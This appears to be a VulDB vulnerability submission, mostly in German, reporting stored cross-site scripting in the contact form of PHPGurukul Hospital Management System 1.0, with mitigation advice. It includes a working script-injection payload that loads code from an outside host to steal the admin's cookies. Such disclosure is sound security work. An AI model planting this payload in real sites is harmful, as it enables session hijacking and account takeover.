| Titel | PHPGurukul Hospital Management System 1.0 Cross site scripting |
|---|
| Beschreibung | Details:
- **Affected Component:** Contact Us Form
- **Endpoint:** `https://192.168.1.12/Hospital-Management-System-PHP/hospital/index.php#contact_us`
- **Vulnerable Input Fields:** Name, Email Address, message
- **Exploitable Payload:** `"><script src="https://js.rip/9jgolnku9i"></script>`
- **Impact:** Admin's cookies compromised upon reviewing Contact Us queries.
Recommendations:
1. Validate and sanitize user inputs.
2. Implement Content Security Policy (CSP) for XSS mitigation.
3. Promptly investigate and address this vulnerability. |
|---|
| Quelle | ⚠️ https://drive.google.com/file/d/1MkVtMe63h5TlZvcC_Hc1fn6dn-jwNR8l/view?usp=sharing |
|---|
| Benutzer | mallutrojan (UID 60819) |
|---|
| Einreichung | 03.01.2024 17:20 (vor 2 Jahren) |
|---|
| Moderieren | 06.01.2024 16:43 (3 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 249843 [PHPGurukul Hospital Management System 1.0 Contact Form index.php#contact_us Name/Email/Message Cross Site Scripting] |
|---|
| Punkte | 20 |
|---|